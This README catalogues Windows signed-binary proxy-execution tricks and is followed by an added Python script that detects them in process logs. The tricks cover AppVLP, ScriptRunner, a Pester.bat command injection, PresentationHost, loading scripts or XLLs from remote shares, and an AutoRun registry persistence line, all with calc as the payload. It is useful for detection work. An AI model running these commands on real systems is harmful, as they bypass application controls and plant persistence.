# Code Execution...
Generally useless ways to exec code.

## appvlp.exe
```
C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe', '', '', 'open', 1)"
C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe \\webdav\calc.bat
```

## scriptrunner.exe
```
C:\Windows\System32\ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
C:\Windows\System32\ScriptRunner.exe -appvscript powershell.exe -args
```

## pester.bat
```
C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat help "; Get-Process"
```

## powershellcustomhost.exe (Likely installed with IIS)
```
C:\Program Files\IIS\Microsoft Web Deploy V3\Scripts\powershellcustomhost.exe calc.ps1
```

## presentationhost.exe
```
PresentationHost.exe file://c:\windows\system32\calc.exe
```

## command processor
```
reg add "HKCU\Software\Microsoft\Command Processor" /v AutoRun /d "start calc.exe"
```
Open a command prompt and calculate.
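
For defenders, the command lines listed in this README can be turned into a first-pass triage over process-creation logs. The following is an added example, not part of the original repository; the rule names, the `triage` and `report` helpers and the sample lines are constructed for illustration, and the input is assumed to be the command-line field of a process-creation event.

```python
import re

# Added example: rules derived only from the command lines in this README.
# Rule names are hypothetical; each pattern runs against a full command line.
RULES = [
    ("appvlp_proxy_exec", re.compile(r'\\appvlp\.exe"?\s+\S', re.I)),
    ("scriptrunner_appvscript",
     re.compile(r'\\scriptrunner\.exe"?\s+.*-appvscript\b', re.I)),
    ("pester_bat_injection", re.compile(r'\\pester\.bat"?\s+.*;', re.I)),
    ("powershellcustomhost_script",
     re.compile(r'\\powershellcustomhost\.exe"?\s+\S+\.ps1\b', re.I)),
    ("presentationhost_file_uri",
     re.compile(r'presentationhost\.exe"?\s+file://', re.I)),
    ("cmd_autorun_value", re.compile(
        r'\breg(\.exe)?"?\s+add\s+.*\\Command Processor.*\s/v\s+AutoRun\b', re.I)),
]
# A payload on a remote share (\\host\...) is tagged only when a rule
# already matched, so ordinary UNC usage is not flagged on its own.
UNC = re.compile(r'''(?:^|[\s'"])\\\\[\w.$-]+\\''')


def triage(command_line):
    """Return the names of all rules that match one command line."""
    hits = [name for name, rx in RULES if rx.search(command_line)]
    if hits and UNC.search(command_line):
        hits.append("remote_unc_payload")
    return hits


# Constructed sample input: six lines taken from the README's listings plus
# two benign lines that must not alert.
SAMPLES = [
    r"C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe \\webdav\calc.bat",
    r'C:\Windows\System32\ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"',
    r'C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat help "; Get-Process"',
    r"C:\Program Files\IIS\Microsoft Web Deploy V3\Scripts\powershellcustomhost.exe calc.ps1",
    r"PresentationHost.exe file://c:\windows\system32\calc.exe",
    r'reg add "HKCU\Software\Microsoft\Command Processor" /v AutoRun /d "start calc.exe"',
    r'reg query "HKCU\Software\Microsoft\Command Processor" /v AutoRun',
    r"C:\Windows\System32\cmd.exe /c dir \\fileserver\share",
]


def report(lines=SAMPLES):
    """Return (line, hits) pairs for lines that matched at least one rule."""
    return [(line, triage(line)) for line in lines if triage(line)]


if __name__ == "__main__":
    for line, hits in report():
        print(", ".join(hits), "<-", line)
```

The patterns match on image name and argument shape only, so they are a starting point for hunting rather than a tuned detection; baseline legitimate App-V, Pester and Web Deploy usage before alerting on them.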